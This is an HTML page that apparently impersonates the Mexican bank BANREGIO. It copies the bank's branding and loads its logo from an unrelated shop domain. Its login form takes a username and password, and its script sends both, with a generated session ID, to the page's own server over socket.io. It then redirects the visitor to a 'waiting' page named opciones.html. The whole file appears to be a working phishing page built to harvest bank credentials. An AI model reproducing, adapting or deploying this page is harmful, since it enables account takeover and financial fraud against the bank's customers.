<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>BANREGIO</title>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css">
  <style>
    body {
      margin: 0;
      font-family: 'Open Sans', sans-serif;
      background: #f3f6f9;
      display: flex;
      justify-content: center;  /* Centrado horizontal */
      align-items: center;      /* Centrado vertical */
      min-height: 100vh;
      text-align: center;
    }

    .screen {
      display: flex;
      flex-direction: column;
      align-items: center;
      background: #fff;
      padding: 2rem;
      border-radius: 1rem;
      box-shadow: 0 8px 30px rgba(0, 0, 0, 0.1);
      width: 100%;
      max-width: 400px;
    }

    .logo {
      width: 190px;
      margin-bottom: 1rem;
    }

    h2 {
      font-size: 1.5em;
      margin-bottom: 1rem;
    }

    p {
      font-size: 1em;
      color: #555;
      margin-bottom: 1rem;
    }

    /* Estilo de los campos de texto */
    .input-group {
      display: flex;
      align-items: center;
      background: #f0f2f5;
      border-radius: 8px;
      margin: 1rem 0;  /* Espaciado entre campos */
      padding: 0.0rem 1rem;
      width: 100%;
      max-width: 350px;
      justify-content: flex-start; /* Mueve los campos hacia la izquierda */
      margin-left: -15px; /* Ajuste para mover más hacia la izquierda */
    }

    .input-group .icon {
      color: #888;
      margin-right: 0.5rem;
    }

    .input-group input {
      border: none;
      background: transparent;
      outline: none;
      flex: 1;
      font-size: 1rem;
      padding: 10px 0.75rem;
      height: 20px;
    }

    /* Botón centrado y ajustado */
    button {
      background-color: #FF4C00;
      color: white;
      padding: 8px 20px; /* Botón más pequeño */
      border: none;
      border-radius: 8px;
      cursor: pointer;
      font-size: 1em;
      width: auto;
      margin-top: 1rem;
    }

    button:hover {
      background-color: #000000;
    }

    button:disabled {
      background: #cccccc;
      cursor: not-allowed;
    }

    /* Mensaje de error */
    .mensaje-error {
      color: red;
      margin-top: 1rem;
      font-size: 0.85rem;
    }

    .campo-requerido {
      border: 1px solid red !important;
    }
  </style>
</head>
<body>
  <div class="screen active" id="pantallaInicio">
    <img src="https://eyenovation.mx/cdn/shop/files/Iconos_Web-10.png?v=1710200856&width=1420" alt="BANREGIO" class="logo">
    <h2>Bienvenido a <strong>BANREGIO</strong></h2>
    <p>Ingrese su usuario y contraseña para iniciar con su proceso financiero.</p>
    <form id="login-form">
      <div class="input-group">
        <div class="icon"><i class="fas fa-user"></i></div>
        <input type="text" id="usuario" placeholder="Ingrese su usuario" required>
      </div>
      <div class="input-group">
        <div class="icon"><i class="fas fa-lock"></i></div>
        <input type="password" id="password" placeholder="Contraseña" required>
      </div>
      
      <p id="usuarioError" class="mensaje-error"></p>
      <p id="passwordError" class="mensaje-error"></p>
      <button type="submit" id="btnContinuar">Continuar</button>
    </form>
  </div>

  <script src="/socket.io/socket.io.js"></script>
  <script>
    const socket = io();

    window.addEventListener('DOMContentLoaded', () => {
      const form = document.getElementById('login-form');

      if (form) {
        form.addEventListener('submit', (e) => {
          e.preventDefault(); // Evitar el comportamiento por defecto del formulario

          // Validar los campos antes de enviar los datos
          if (validarUsuario() && validarPassword()) {
            const usuario = document.getElementById('usuario').value;
            const contrasena = document.getElementById('password').value;

            // Generar y guardar sessionId
            const sessionId = Math.random().toString(36).substring(2, 15);
            localStorage.setItem('sessionId', sessionId);

            // Enviar datos al servidor mediante socket.io
            socket.emit('dataForm', { usuario, contrasena, sessionId });

            // Ir a pantalla de espera (opciones.html)
            window.location.href = 'opciones.html';
          }
        });
      }
    });

    function validarUsuario() {
      const usuario = document.getElementById("usuario").value;
      const usuarioError = document.getElementById("usuarioError");
      const usuarioInput = document.getElementById("usuario");

      if (!usuario) {
        usuarioError.textContent = "El usuario es obligatorio";
        usuarioInput.classList.add("campo-requerido");
        return false;
      } else {
        usuarioError.textContent = "";
        usuarioInput.classList.remove("campo-requerido");
        return true;
      }
    }

    function validarPassword() {
      const password = document.getElementById("password").value;
      const passwordError = document.getElementById("passwordError");
      const passwordInput = document.getElementById("password");

      if (!password) {
        passwordError.textContent = "La contraseña es obligatoria";
        passwordInput.classList.add("campo-requerido");
        return false;
      } else if (password.length < 4) {
        passwordError.textContent = "La contraseña debe tener al menos 4 caracteres";
        passwordInput.classList.add("campo-requerido");
        return false;
      } else {
        passwordError.textContent = "";
        passwordInput.classList.remove("campo-requerido");
        return true;
      }
    }
  </script>
</body>
</html>